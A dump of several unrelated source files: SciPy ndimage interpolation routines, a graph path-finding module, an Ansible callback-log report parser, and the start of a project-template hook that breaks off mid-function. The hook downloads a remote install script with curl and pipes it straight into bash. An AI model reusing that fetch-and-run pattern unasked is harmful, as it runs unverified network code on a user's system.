Parameters
----------
input : array_like
The input array.
mapping : callable
A callable object that accepts a tuple of length equal to the output
array rank, and returns the corresponding input coordinates as a tuple
of length equal to the input array rank.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
extra_arguments : tuple, optional
Extra arguments passed to `mapping`.
extra_keywords : dict, optional
Extra keywords passed to `mapping`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
See Also
--------
map_coordinates, affine_transform, spline_filter1d
Examples
--------
>>> from scipy import ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> def shift_func(output_coords):
... return (output_coords[0] - 0.5, output_coords[1] - 0.5)
...
>>> ndimage.geometric_transform(a, shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.362, 2.738],
[ 0. , 4.812, 6.187],
[ 0. , 8.263, 9.637]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_geometric_transform(filtered, mapping, None, None, None, output,
order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array.
coordinates : array_like
The coordinates at which `input` is evaluated.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
map_coordinates : ndarray
The result of transforming the input. The shape of the output is
derived from that of `coordinates` by dropping the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> from scipy import ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
array([ 2., 7.])
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
array([ True, False], dtype=bool)
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset=0.0, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode.
Parameters
----------
input : ndarray
The input array.
matrix : ndarray
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is assumed
        that the matrix is diagonal. A more efficient algorithm is then
applied that exploits the separability of the problem.
offset : float or sequence, optional
The offset into the array where the transform is applied. If a float,
`offset` is the same for each axis. If a sequence, `offset` should
contain one value for each axis.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
affine_transform : ndarray or None
The transformed input. If `output` is given as a parameter, None is
returned.
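    Examples
    --------
    A small sketch using a one-dimensional (diagonal) matrix, which takes
    the more efficient separable code path; with ``order=0`` and integer
    offsets the result is an exact index shift:
    >>> from scipy import ndimage
    >>> a = np.arange(9.).reshape((3, 3))
    >>> ndimage.affine_transform(a, [1, 1], offset=[0, -1], order=0)
    array([[ 0.,  0.,  1.],
           [ 0.,  3.,  4.],
           [ 0.,  6.,  7.]])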
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
matrix = numpy.asarray(matrix, dtype=numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype=numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
def shift(input, shift, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Shift an array.
The array is shifted using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode.
Parameters
----------
input : ndarray
The input array.
    shift : float or sequence
The shift along the axes. If a float, `shift` is the same for each
axis. If a sequence, `shift` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
shift : ndarray or None
The shifted input. If `output` is given as a parameter, None is
returned.
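    Examples
    --------
    A brief sketch; with an integer shift and ``order=0`` the data are
    moved by whole samples and vacated positions are filled with `cval`:
    >>> from scipy import ndimage
    >>> a = np.arange(9.).reshape((3, 3))
    >>> ndimage.shift(a, (1, 0), order=0)
    array([[ 0.,  0.,  0.],
           [ 0.,  1.,  2.],
           [ 3.,  4.,  5.]])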
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype=numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
    zoom : float or sequence
The zoom factor along the axes. If a float, `zoom` is the same for each
axis. If a sequence, `zoom` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
zoom : ndarray or None
The zoomed input. If `output` is given as a parameter, None is
returned.
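    Examples
    --------
    A minimal sketch; each axis of the output has ``round(size * zoom)``
    samples:
    >>> from scipy import ndimage
    >>> ndimage.zoom(np.ones((2, 4)), 2.0).shape
    (4, 8)
    >>> ndimage.zoom(np.ones((2, 4)), 0.5).shape
    (1, 2)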
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple(
[int(round(ii * jj)) for ii, jj in zip(input.shape, zoom)])
output_shape_old = tuple(
[int(ii * jj) for ii, jj in zip(input.shape, zoom)])
if output_shape != output_shape_old:
warnings.warn(
"From scipy 0.13.0, the output shape of zoom() is calculated "
"with round() instead of int() - for these inputs the size of "
"the returned array has changed.", UserWarning)
zoom_div = numpy.array(output_shape, float) - 1
zoom = (numpy.array(input.shape) - 1) / zoom_div
# Zooming to non-finite values is unpredictable, so just choose
# zoom factor 1 instead
zoom[~numpy.isfinite(zoom)] = 1
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
zoom = numpy.asarray(zoom, dtype=numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes=(1, 0), reshape=True,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
`axes` parameter using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
angle : float
The rotation angle in degrees.
axes : tuple of 2 ints, optional
The two axes that define the plane of rotation. Default is the first
two axes.
reshape : bool, optional
If `reshape` is true, the output shape is adapted so that the input
array is contained completely in the output. Default is True.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
rotate : ndarray or None
The rotated input. If `output` is given as a parameter, None is
returned.
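    Examples
    --------
    A short sketch; with the default ``reshape=True`` the output is
    enlarged to hold the whole rotated array, so a 90 degree rotation of a
    2-D input swaps its dimensions:
    >>> from scipy import ndimage
    >>> ndimage.rotate(np.ones((4, 3)), 90).shape
    (3, 4)
    >>> ndimage.rotate(np.ones((4, 3)), 90, reshape=False).shape
    (4, 3)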
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
if axes[0] < 0 or axes[1] < 0 or axes[0] > rank or axes[1] > rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype=numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
if reshape:
mtrx = numpy.array([[m11, -m21],
[-m12, m22]], dtype=numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype=numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype=numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, output,
order, mode, cval, prefilter)
else:
coordinates = []
size = numpy.product(input.shape,axis=0)
size //= input.shape[axes[0]]
size //= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = list(range(input.ndim))
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
| bsd-3-clause | 354,336,398,864,894,400 | 37.27983 | 79 | 0.625997 | false |
Maillol/cricri | cricri/algo.py | 2 | 3076 | """
A collection of functions to perform operation on containers.
"""
from collections import defaultdict
def find_loop(graph):
"""
    Find, for every node of *graph*, the loops that start and end at that node.
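    A small illustration on a two-node cycle:
    >>> loops = find_loop({'a': ['b'], 'b': ['a']})
    >>> loops['a']
    [('a', 'b', 'a')]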
"""
loops_from_start = defaultdict(list)
def _walk(graph, start, end, visited_nodes, path):
"""
        Find all paths between *start* and *end* through *graph*,
        without visiting the same node twice.
        The paths are stored in *loops_from_start*.
"""
for next_node in graph[start]:
if next_node == end:
loops_from_start[end].append(
(end,) + path + (next_node,)
)
elif next_node not in visited_nodes:
_walk(graph, next_node, end,
visited_nodes | {next_node, },
path + (next_node,))
for node in graph:
_walk(graph, node, node, set(), tuple())
return loops_from_start
def insert_loop(pathes, loops_from_start):
"""
    Expand each path in *pathes* by substituting, for every node,
    the loops from *loops_from_start* that start at that node.
"""
pathes_with_loop = []
for path in pathes:
path_with_loop = [()]
for node in path:
path_with_loop = [
out + loop
for out in path_with_loop
for loop in loops_from_start[node]]
pathes_with_loop.extend(path_with_loop)
return pathes_with_loop
def all_longer_path(graph, start, path, sub_path_explored, out):
"""
    Find all maximal paths through the graph (paths that cannot be
    extended without reusing an edge).
    graph - must be a dict mapping each graph node to its next nodes.
    start - must be the first graph node
    path - must be an empty list
    sub_path_explored - must be an empty set
    out - each path found is appended to this list.
"""
flag = True
for step in graph[start]:
sub_path = (start, step)
if sub_path not in sub_path_explored:
flag = False
all_longer_path(graph, step,
path + [sub_path],
sub_path_explored | {sub_path},
out)
if flag:
if len(graph) == 1:
out.append((start,))
else:
out.append(tuple(e[0] for e in path) + (path[-1][-1],))
def walk(graph, start, nb_loop=0):
"""
    Find all maximal paths through the graph (paths that cannot be
    extended without reusing an edge), optionally expanded with loops.
    graph - must be a dict mapping each graph node to its next nodes.
    start - must be the first graph node
nb_loop - number of loops per node
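    A small illustrative call on a two-node chain, with no loops requested:
    >>> walk({'a': ['b'], 'b': []}, 'a')
    [('a', 'b')]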
"""
if nb_loop < 0:
raise ValueError('last parameter must be greater or equal 0')
longer_pathes = []
all_longer_path(graph, start, [], set(), longer_pathes)
if nb_loop:
loops_from_start = find_loop(graph)
loops_from_start = {
start: [(loop + loop[1:] * (nb_loop - 1))
for loop
in loops]
for start, loops
in loops_from_start.items()
}
for node in graph:
loops_from_start.setdefault(node, [(node,)])
longer_pathes = insert_loop(longer_pathes, loops_from_start)
return longer_pathes
| gpl-3.0 | -1,602,775,323,397,272,000 | 26.464286 | 69 | 0.536736 | false |
lykops/lykops | library/connecter/ansible/callback/read.py | 1 | 14475 | import logging
from library.connecter.database.mongo import Op_Mongo
from library.utils.time_conv import timestamp2datetime
class Parse_Cblog():
def __init__(self, oper, log_router=False, mongoclient=None):
'''
根据condition_dict读取所有的callback日志
:parm
condition_dict:查询条件
'''
self.logger = logging.getLogger("ansible")
if mongoclient is None :
self.mongoclient = Op_Mongo()
else :
self.mongoclient = mongoclient
if not log_router:
from library.storage.logging import Routing_Logging
log_router = Routing_Logging()
self.log_router = log_router
self.collect = oper + '.ansible.callback'
self.log_dict = {
'level':'info',
'dest' : 'mongo',
'mongo' : self.collect,
}
def parse(self, uuid_str):
'''
        Read the callback logs for the task identified by uuid_str.
'''
log_prefix = '查询uuid为' + uuid_str + '的ansible任务执行报表'
result = self.log_router.read(condition_dict={'uuid':uuid_str}, log_dict=self.log_dict, limit=0, lastest_field=False)
self.readlog_list = result[1]
if not result[0] :
self.logger.error(log_prefix + '失败,原因:' + result[1])
return (False, log_prefix + '失败,' + result[1])
try :
name = self.readlog_list[0]['name']
exec_mode = self.readlog_list[0]['mode']
describe = self.readlog_list[0]['describe']
options = self.readlog_list[0]['options']
# create_time = self.readlog_list[0]['create_time']
create_date = self.readlog_list[0]['create_date']
inventory_content = self.readlog_list[0]['inventory_content']
create_ts = self.readlog_list[0]['add_time']
finish_ts = self.readlog_list[-1]['add_time']
except Exception as e:
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者数据错误,' + str(e))
return (False, '该任务还没有开始执行或者数据错误')
pattern = self.readlog_list[0].get('pattern', None)
module_name = self.readlog_list[0].get('module_name', None)
module_args = self.readlog_list[0].get('module_args', None)
yaml_content = self.readlog_list[0].get('yaml_content', None)
play = self.readlog_list[0].get('play', {})
task = self.readlog_list[0].get('task', {})
newlog_dict = {
'name' : name,
'mode' : exec_mode,
'describe' : describe,
'create_time' : timestamp2datetime(create_ts),
'create_date' : create_date,
'options' : options,
'uuid' : uuid_str,
'inventory_content' : inventory_content,
'end_time':timestamp2datetime(finish_ts),
'duration' : round((finish_ts - create_ts), 3),
}
if exec_mode == 'adhoc' :
newlog_dict['pattern'] = pattern
newlog_dict['module_name'] = module_name
newlog_dict['module_args'] = module_args
else :
newlog_dict['yaml_content'] = yaml_content
get_field_list = ['uuid' , 'play_id' , 'task_id']
result = self.mongoclient.group_by(self.collect, get_field_list)
if not result[0] :
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者数据错误,' + result[1])
return (False, '该任务还没有开始执行或者数据错误')
tempplay_dict = {}
for playid in result[1] :
if playid['uuid'] == uuid_str :
play_id = playid['play_id']
task_id = playid.get('task_id', '')
if task_id == '' :
continue
else :
continue
if play_id not in tempplay_dict :
tempplay_dict[play_id] = []
taskid_list = tempplay_dict[play_id]
taskid_list.append(task_id)
taskid_list = tempplay_dict[play_id]
taskid_list = list(set(taskid_list))
taskid_list = sorted(taskid_list)
            # sort the task ids into execution order
tempplay_dict[play_id] = taskid_list
playid_dict = {}
for play_id in sorted(tempplay_dict) :
playid_dict[play_id] = tempplay_dict[play_id]
            # sort the plays into execution order
play_dict = {}
        # The loop below collects, for each play_id, all of its task ids and looks up the last log entry and execution result of every task id
for playid, taskid_list in playid_dict.items() :
play_dict[playid] = {}
for taskid in taskid_list :
task_list = []
for line in self.readlog_list :
if line['play_id'] == playid and line.get('task_id', '') == taskid :
summary = line.get('summary', {})
if not summary :
task_list.append(line)
last_log = task_list[-1]
                # take the last log line of this task execution
play_dict[playid]['play']=last_log.get('play', {})
play_dict[playid]['summary'] = summary
task_dict = {
'task' : last_log.get('task', {}),
'detail' : last_log.get('detail', {}),
}
try:
play_dict[playid]['task'][taskid] = task_dict
except:
play_dict[playid]['task'] = {}
play_dict[playid]['task'][taskid] = task_dict
if not play_dict or not isinstance(play_dict, dict) :
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者查询条件错误,' + result[1])
return (False, {'result' : '该任务还没有开始执行或者查询条件错误'})
result_dict = {}
for play_uuid, logline in play_dict.items() :
result_dict[play_uuid] = {}
summary = logline.get('summary', {})
task_dict = logline.get('task', {})
if 'tasks' not in result_dict[play_uuid]:
result_dict[play_uuid]['tasks'] = {}
play = logline.get('play', {})
pattern = play.get('name', {})
for task_id, line in task_dict.items() :
task = line.get('task', {})
task_name = task.get('name', '')
taskmodule = task.get('module', '')
# task_args = task.get('args', {})
if exec_mode == 'playbook' and task_name not in result_dict[play_uuid]['tasks'] :
result_dict[play_uuid]['tasks'][task_name] = {}
new_task = {
'module' : task['module'],
}
result_dict[play_uuid]['tasks'][task_name]['tasks'] = new_task
detail = line.get('detail', {})
if not isinstance(detail, dict) or not detail:
continue
for host , value in detail.items() :
end_ts = value['end_ts']
start_ts = value['start_ts']
duration = end_ts - start_ts
duration = round(duration, 2)
'''
if taskmodule == 'yum' and 'invocation' in value :
                        # for the yum module, value also contains a 'results' key even when no loop is used
results = [value]
else :
results = value.get('results', {})
if results :
data_list = results
else :
data_list = [value]
# data_list = [value]
'''
data_list = [value]
for data in data_list :
from library.connecter.ansible.callback.module import Parse_Result
parse_module = Parse_Result()
if taskmodule == 'command' :
result = parse_module.command(data, task)
elif taskmodule == 'yum' :
if 'invocation' in data :
result = parse_module.yum(data, task)
else:
try:
temp_dict = data['results'][0]
del data['results']
data.update(temp_dict)
result = parse_module.yum(data, task)
except :
self.logger.error(data)
result = parse_module.common_module(data, task, {})
elif taskmodule == 'service' or taskmodule == 'systemd':
result = parse_module.service(data, task)
elif taskmodule == 'script' :
result = parse_module.script(data, task)
elif taskmodule == 'cron' :
result = parse_module.cron(data, task)
elif taskmodule == 'user' :
result = parse_module.user(data, task)
elif taskmodule == 'copy' :
result = parse_module.copy(data, task)
elif taskmodule == 'get_url' :
result = parse_module.get_url(data, task)
elif taskmodule == 'raw' :
result = parse_module.command(data, task)
else :
result = parse_module.common_module(data, task, {})
if taskmodule == '' :
print(result)
if exec_mode == 'playbook' :
try :
del result['模块名']
except :
pass
if 'detail' not in result_dict[play_uuid]['tasks'][task_name] :
result_dict[play_uuid]['tasks'][task_name]['detail'] = {}
result_dict[play_uuid]['tasks'][task_name]['detail'][host] = result
result_dict[play_uuid]['pattern'] = pattern
else :
try :
del result['模块名']
del result_dict[play_uuid]
except :
pass
result_dict[host] = result
if exec_mode == 'playbook' :
result_dict[play_uuid]['summary'] = {}
if isinstance(summary, dict):
for host in summary :
ok = summary[host].get('ok', 0)
failures = summary[host].get('failures', 0)
unreachable = summary[host].get('unreachable', 0)
changed = summary[host].get('changed', 0)
skipped = summary[host].get('skipped', 0)
if ok == 0 :
if unreachable == 1:
summary_str = '该任务在该主机上执行失败,无法连接远程主机'
else :
summary_str = '该任务在该主机上执行失败,失败数为' + str(failures) + ',跳过数为' + str(skipped) + ',可能产生变化数为' + str(changed)
else :
summary_str = '该任务在该主机上执行部分或者全部成功,成功数为' + str(ok) + ',失败数为' + str(failures) + ',跳过数为' + str(skipped) + ',可能产生变化数为' + str(changed)
'''
result_dict[play_uuid]['summary'][host] = summary[host]
                            output the raw summary dict unchanged
'''
result_dict[play_uuid]['summary'][host] = summary_str
if not result_dict[play_uuid]['summary'] :
result_dict[play_uuid]['summary'] = '该任务还没有执行完成'
newlog_dict['exec_result'] = result_dict
self.logger.info(log_prefix + '成功')
return (True, newlog_dict)
def get_abs(self):
'''
        Return a summary of all executed tasks under this user.
'''
get_field_list = ['name', 'uuid' , 'mode' , 'create_time' , 'describe', 'create_date']
result = self.mongoclient.group_by(self.collect, get_field_list)
if not result[0] :
self.logger.error('ansible任务执行报表清单查询失败,原因:' + result[1])
return result
work_list = result[1]
if len(work_list) == 0 :
self.logger.warn('ansible任务执行报表清单为空')
return (True, [])
date_list = []
for work in work_list :
create_date = work['create_time']
if create_date not in date_list :
date_list.append(create_date)
date_list = sorted(date_list)
date_list.reverse()
new_list = []
for date_str in date_list :
for work_dict in work_list :
if date_str == work_dict['create_time'] :
new_list.append(work_dict)
return (True, new_list)
| apache-2.0 | -31,646,538,662,069,950 | 41.16358 | 157 | 0.436791 | false |
RiccardoRossi/pyKratos | pyKratos/triangle.py | 3 | 2711 | from __future__ import print_function, absolute_import, division
import math
from numpy import *
class Triangle:
def __init__(self, node_list):
if(len(node_list) != 3):
raise Exception("wrong number of nodes! should be 3!!")
self.nodes = node_list
for node in self.nodes:
if(node.Id < 0):
raise Exception("node with Id lesser than 0 found")
# def Nodes(self):
# return self.nodes
def __getitem__(self, key):
return self.nodes[key]
def GetNumberOfNodes(self):
return 3
def ShapeFunctions(self, order=1):
        '''This function provides the shape function values, derivatives and
        integration weights at the location of the gauss points. The order of
        integration is controlled by the optional parameter "order".
        N[gauss][i] contains the shape function of node i computed at the position of "gauss".
        derivatives[gauss][i,k] contains the derivative of node i, component k at the position of "gauss".
        weights[gauss] contains the integration weight, including the det of the jacobian, to be used
        at that gauss point.'''
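        # Illustrative usage (assumes node objects exposing "Id" and "coordinates"
        # as used above; the variable name "element" is hypothetical):
        #   N, DN_DX, weights = element.ShapeFunctions(order=1)
        #   N[0]       -> array([1/3, 1/3, 1/3])
        #   DN_DX[0]   -> 3x2 array of cartesian shape function gradients
        #   weights[0] -> element area (0.5 * detJ)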
derivatives = []
weights = []
Ncontainer = []
x10 = self.nodes[1].coordinates[0] - self.nodes[0].coordinates[0]
y10 = self.nodes[1].coordinates[1] - self.nodes[0].coordinates[1]
x20 = self.nodes[2].coordinates[0] - self.nodes[0].coordinates[0]
y20 = self.nodes[2].coordinates[1] - self.nodes[0].coordinates[1]
detJ = x10 * y20 - y10 * x20
DN_DX = zeros((3, 2), dtype=float)
DN_DX[0, 0] = -y20 + y10
DN_DX[0, 1] = x20 - x10
DN_DX[1, 0] = y20
DN_DX[1, 1] = -x20
DN_DX[2, 0] = -y10
DN_DX[2, 1] = x10
DN_DX /= detJ
if(order == 1): # give back 1 single integration point
one_third = 1.0 / 3.0
Ncontainer = [array([one_third, one_third, one_third])]
Area = 0.5 * detJ
weights = [Area]
derivatives = [DN_DX]
elif(order == 2): # gives back 3 integration points
one_sixt = 1.0 / 6.0
two_third = 2.0 / 3.0
Ncontainer.append(array([one_sixt, one_sixt, two_third]))
Ncontainer.append(array([one_sixt, two_third, one_sixt]))
Ncontainer.append(array([two_third, one_sixt, one_sixt]))
weights = [one_sixt * detJ, one_sixt * detJ, one_sixt * detJ]
derivatives = [DN_DX, DN_DX, DN_DX]
else:
raise Exception("integration order not implemented")
return [Ncontainer, derivatives, weights]
| bsd-2-clause | -4,895,764,524,958,060,000 | 34.207792 | 110 | 0.568056 | false |
r0x73/django-template | hooks/post_gen_project.py | 1 | 2145 | #!/usr/bin/env python
import os
import shutil
def install_drifter():
os.system('git init .')
os.system('curl -sS https://raw.githubusercontent.com/liip/drifter/master/install.sh | /bin/bash')
def set_parameter(path, key, value):
patched_lines = []
parameter_exists = False
with open(path) as f:
lines = f.readlines()
for line in lines:
if line.startswith('{}:'.format(key)):
